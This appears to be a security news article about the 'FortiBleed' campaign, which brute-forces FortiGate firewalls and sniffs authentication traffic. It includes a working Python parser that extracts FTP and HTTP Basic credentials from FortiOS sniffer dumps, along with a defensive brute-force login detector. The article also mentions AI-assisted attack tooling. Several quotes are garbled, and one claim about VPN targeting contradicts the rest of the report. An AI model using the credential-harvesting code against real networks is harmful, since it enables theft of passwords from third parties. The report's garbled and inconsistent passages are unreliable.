FortiBleed Targets FortiGate Firewalls in 110 Million-Credential Harvesting Operation

Ravie Lakshmanan | June 23, 2026 | Initial Access Broker / Security Broker

A financially motivated, Russian-speaking initial access broker (IAB) is suspected of being behind a massive credential-harvesting operation codenamed FortiBleed that has compromised more than 430,000 FortiGate firewalls worldwide.

The campaign, which has been active since February 2026, involves harvesting credential lists, scanning for exposed devices, brute-forcing the ones that are reachable, and deploying sniffers on the firewalls that get compromised.

“Once deployed, these sensors capture cleartext and instant information from traffic passing through compromised devices,” SOCRadar said in a new report [PDF]. “The actors then crack, verify, and reuse credentials against Active Directory domains and other exposed services.”

Central to the operation is a Golang-based tool called FortigateSniffer, which wraps FortiOS's built-in "diagnose sniffer packet" command to passively capture authentication traffic on compromised devices. The tool is designed to monitor traffic across 24 protocols, parse the authentication exchanges it sees, and extract credentials and password hashes from them.
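As an added illustration (not FortigateSniffer itself, nor code from the SOCRadar report), the Python below shows what a parser for the firewall's own sniffer output has to do to turn hex dumps into credentials: rebuild the TCP payload from the Ethernet/IP/TCP headers, reassemble each client-to-server stream, and match the cleartext login exchanges. The sample dump is constructed here, and the verbose-6 column layout, timestamps and addresses are assumptions of the example.

```python
"""Pull cleartext credentials out of FortiOS "diagnose sniffer packet" output.

Added example, not FortigateSniffer or any code from SOCRadar's report. The
firewall's sniffer prints frames as hex dumps; an attacker with CLI access only
needs to parse them. The sample below is CONSTRUCTED; the dump layout (header
line, then offset / hex words / ASCII columns, as at verbose level 6) is assumed.
"""
import base64
import re
import struct
from collections import defaultdict


# ---- constructed sample, rendered in the sniffer's hex-dump shape -----------
def _frame(src, sport, dst, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums stay zero because the bytes
    are only parsed back, never transmitted."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def _dump(ts, src, sport, dst, dport, payload):
    frame = _frame(src, sport, dst, dport, payload)
    lines = [f"{ts} port1 in {src}.{sport} -> {dst}.{dport}: psh 1 ack 1"]
    for off in range(0, len(frame), 16):
        chunk = frame[off:off + 16]
        words = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"0x{off:04x}\t {words}\t{text}")
    return "\n".join(lines)


SAMPLE = "\n".join([
    _dump("1.000001", "192.168.10.23", 51234, "10.0.0.5", 21, b"USER backup\r\n"),
    _dump("1.000002", "10.0.0.5", 21, "192.168.10.23", 51234, b"331 Password required\r\n"),
    _dump("1.000003", "192.168.10.23", 51234, "10.0.0.5", 21, b"PASS Winter2026!\r\n"),
    # the HTTP request is split across two segments to exercise stream reassembly
    _dump("2.000001", "192.168.10.44", 50112, "10.0.0.8", 80,
          b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthoriz"),
    _dump("2.000002", "192.168.10.44", 50112, "10.0.0.8", 80,
          b"ation: Basic YWRtaW46UEBzc3cwcmQ=\r\n\r\n"),
    # TLS traffic: carried through the parser but yields nothing
    _dump("3.000001", "192.168.10.9", 40000, "10.0.0.9", 443, b"\x16\x03\x01\x00\x05hello"),
])

# ---- parser ------------------------------------------------------------------
HDR_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+)\.(\d+) -> (\d+\.\d+\.\d+\.\d+)\.(\d+):")
HEX_RE = re.compile(r"^0x[0-9a-f]{4}\s+((?:[0-9a-f]{2,4} ?)+)", re.I)


def tcp_payload(frame):
    """Strip Ethernet, IPv4 and TCP headers using the length fields in the
    headers themselves (IHL, total length, data offset), not fixed sizes."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # IP protocol 6 = TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    doff = (tcp[12] >> 4) * 4
    return tcp[doff:]


def parse_sniffer_output(text):
    """Return [(src, sport, dst, dport, payload)] for each TCP frame with data."""
    segments, cur, hexbuf = [], None, []

    def flush():
        if cur is None:
            return
        payload = tcp_payload(bytes.fromhex("".join(hexbuf)))
        if payload:
            segments.append((*cur, payload))

    for line in text.splitlines():
        m = HDR_RE.search(line)
        if m:
            flush()
            cur = (m.group(1), int(m.group(2)), m.group(3), int(m.group(4)))
            hexbuf = []
            continue
        h = HEX_RE.match(line)
        if h and cur is not None:
            hexbuf.append(h.group(1).replace(" ", ""))
    flush()
    return segments


FTP_USER = re.compile(rb"^USER (\S+)\r?$", re.M)
FTP_PASS = re.compile(rb"^PASS (\S+)\r?$", re.M)
BASIC_RE = re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]+)", re.I)


def extract_credentials(text):
    """Reassemble each client->server stream (segments assumed in order, no
    retransmits) and look for FTP logins and HTTP Basic headers."""
    streams = defaultdict(bytes)
    for src, sport, dst, dport, payload in parse_sniffer_output(text):
        streams[(src, sport, dst, dport)] += payload
    found = []
    for (src, sport, dst, dport), data in streams.items():
        server = f"{dst}:{dport}"
        user, pw = FTP_USER.search(data), FTP_PASS.search(data)
        if user and pw:
            found.append({"proto": "ftp", "client": src, "server": server,
                          "user": user.group(1).decode(), "password": pw.group(1).decode()})
        for m in BASIC_RE.finditer(data):
            try:
                u, _, p = base64.b64decode(m.group(1), validate=True).decode().partition(":")
            except (ValueError, UnicodeDecodeError):
                continue  # not a real Basic token: skip rather than crash
            found.append({"proto": "http-basic", "client": src, "server": server,
                          "user": u, "password": p})
    return found


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE):
        print(cred)
```

Two protocols are enough to show the shape of the problem; the 24 protocols the tool covers are the same loop with one matcher per protocol. Defenders can run the same parser over their own sniffer output to see which internal services still authenticate in the clear across the firewall.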

It is suspected that the threat actors may have used an AI-native offensive security platform called CyberStrike to assist with “certain aspects of the workflow.” Interestingly, an open-source framework called CyberStrikeAI was also used in a separate large-scale scanning campaign against FortiGate devices that Amazon Threat Intelligence disclosed earlier this year.

“The campaign shows a strong focus on small and medium-sized businesses (SMBs) with fewer than 200 employees,” SOCRadar explained. “The actor targets many sectors and regions, with a significant emphasis on the United States and India. The IT services sector seems to be the main target. This choice of targeting probably helps the actor to increase the reach of the river, as the service providers involved can create ways to reach the customer’s areas.”

Perhaps the most notable finding is that FortiBleed appears to be part of a larger, multi-vendor program that targets not only Fortinet devices but also Synology NAS appliances, Sophos firewalls, RDWeb portals, Citrix SSL-VPNs, and MS-SQL servers through automated brute-forcing, starting in February 2026.

In all, the attackers are estimated to have run at least 659 separate harvesting pipelines between May 31 and June 15, 2026, yielding more than 110 million credentials and hashes. These include –

  • 14.8 million Remote Authentication Dial-In User Service (RADIUS) credentials
  • 924,000 NTLM hashes
  • 130,000 Kerberos hashes
  • 89 million MySQL authentication tokens

The FortiBleed campaign takes place in five phases –

  • Mass scanning with tools such as Masscan and Shodan to identify Internet-facing FortiGate firewalls, followed by two custom utilities, FortiProbe-fast and GeoSplit, to fingerprint FortiGate systems and group them by country, respectively.
  • Compromising devices with a credential checker called “forticheck” that targets the FortiGate management interface and the SSL-VPN portal, alongside SSH tooling for root-credential and dictionary attacks.
  • Once SSH access is established, deploying FortigateSniffer to intercept authentication traffic across 24 protocols (e.g., TACACS+, Kerberos, RPC, SMB, LDAP, SMTP, FTP, Telnet, RDP, WinRM, MS-SQL, MySQL, PostgreSQL, and RADIUS) and extract credentials and password hashes.
  • Cracking the captured hashes with Hashcat and Hashtopolis, with results collected by a Telegram bot called HASHBOT, after which the recovered credentials are used for lateral movement and Active Directory enumeration.
  • Exfiltrating sensitive data from network shares, while time-stamped cookies are used to maintain persistent, authenticated access.
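The second phase leaves a distinctive trace in the firewall's own event log: a run of failed administrator logins from one source, then a success from the same address. The Python below, an added example rather than code from SOCRadar or Fortinet, implements that detection over constructed log lines in FortiOS key=value layout; the logid values, field names and message text are assumed and should be checked against what your firmware version actually emits.

```python
"""Flag FortiGate admin logins that succeed right after a burst of failures
from the same source IP: the footprint of a credential-checker / dictionary
attack against the management interface.

Added example, not SOCRadar's or Fortinet's code. The sample lines are
CONSTRUCTED in the key=value layout of FortiOS event logs; the logid values,
field names and message text are assumptions of this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta


def _fail(ts, ip, ui, user="admin"):
    return (f'date=2026-06-02 time={ts} logid="0100032002" type="event" subtype="system" '
            f'level="alert" logdesc="Admin login failed" user="{user}" ui="{ui}({ip})" '
            f'method="{ui}" srcip={ip} dstip=198.51.100.2 action="login" status="failed" '
            f'reason="passwd_invalid" msg="Administrator {user} login failed from {ui}({ip}) '
            f'because of invalid password"')


def _ok(ts, ip, ui, user="admin"):
    return (f'date=2026-06-02 time={ts} logid="0100032001" type="event" subtype="system" '
            f'level="information" logdesc="Admin login successful" user="{user}" '
            f'ui="{ui}({ip})" method="{ui}" srcip={ip} dstip=198.51.100.2 action="login" '
            f'status="success" reason="none" msg="Administrator {user} logged in successfully '
            f'from {ui}({ip})"')


SAMPLE_LOGS = [
    # six wrong passwords in six minutes, then a success: the alert case
    *[_fail(f"09:1{i}:03", "203.0.113.7", "ssh") for i in range(6)],
    _ok("09:16:10", "203.0.113.7", "ssh"),
    # an operator mistyping twice before logging in: below threshold, no alert
    _fail("10:02:11", "198.51.100.77", "https"),
    _fail("10:02:40", "198.51.100.77", "https"),
    _ok("10:03:05", "198.51.100.77", "https"),
    # a clean login with no preceding failures
    _ok("11:30:00", "10.0.0.2", "https"),
]

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_fortios_log(line):
    """Split a FortiOS key=value line; quoted values may contain spaces."""
    rec = {k: (v[1:-1] if v.startswith('"') else v) for k, v in KV_RE.findall(line)}
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    return rec


def detect_success_after_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Return one alert per source IP whose successful admin login was preceded
    by at least `threshold` failed admin logins within `window`."""
    failures = defaultdict(list)  # srcip -> timestamps of failed admin logins
    alerts = []
    for rec in map(parse_fortios_log, lines):  # lines assumed to be in time order
        src = rec.get("srcip")
        if rec.get("logdesc") == "Admin login failed":
            failures[src].append(rec["ts"])
        elif rec.get("logdesc") == "Admin login successful":
            recent = [t for t in failures[src] if rec["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"srcip": src, "user": rec.get("user"),
                               "method": rec.get("method"), "failures": len(recent),
                               "first_failure": recent[0], "login_at": rec["ts"]})
            failures[src].clear()  # one burst yields one alert
    return alerts


if __name__ == "__main__":
    for alert in detect_success_after_bruteforce(SAMPLE_LOGS):
        print(alert)
```

The threshold and window are deliberately loose so a legitimate administrator's typos do not fire; the real signal is the success at the end of the burst, which is also the moment a sniffer could be started, so an alert here should be paired with a review of what that session did next.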

“The group does not treat all targets equally,” SOCRadar said. “Instead, targets are calculated in terms of economic value before exploitation resources are allocated.”

The sniffing component also includes a geofencing filter that restricts activity to a defined IP range, and the operation only runs between 7 a.m. and 6 p.m. Moscow time. According to data gathered by SpyCloud, the FortiGate-related capture cycle is said to have started on May 19, 2026, with the hash-cracking infrastructure taken down at the end of the month.

“This work runs in 300-minute (five-hour) cycles, with an event every minute,” Brazilian cybersecurity company Zenox said. “In each cycle it loads the target region list […] and authenticates with 1,000 threads at once, displays counters for success, failure, timeout, and warnings. In the first cycles, the successful verification rate increased to close to 90%.”

The Brazilian cybersecurity company also said it found the same username and password pair repeated across thousands of different IP addresses, suggesting the accounts may have been planted by the attacker as a hidden backdoor.

The development comes as a Russian-speaking actor using the handle “SantaAd” advertised access to thousands of Fortinet devices for an initial price of $30,000, raising it to $60,000 hours later. It is unclear, however, whether this listing has any connection to the FortiBleed activity.

“The group of malicious actors behind ‘FortiBleed’ did not target FortiGate VPNs,” SpyCloud said. “They were actually targeting a range of different cyber-facing machines with a typical network of spray-and-pray attacks that rely heavily on mass scanning and brute force penetration.”
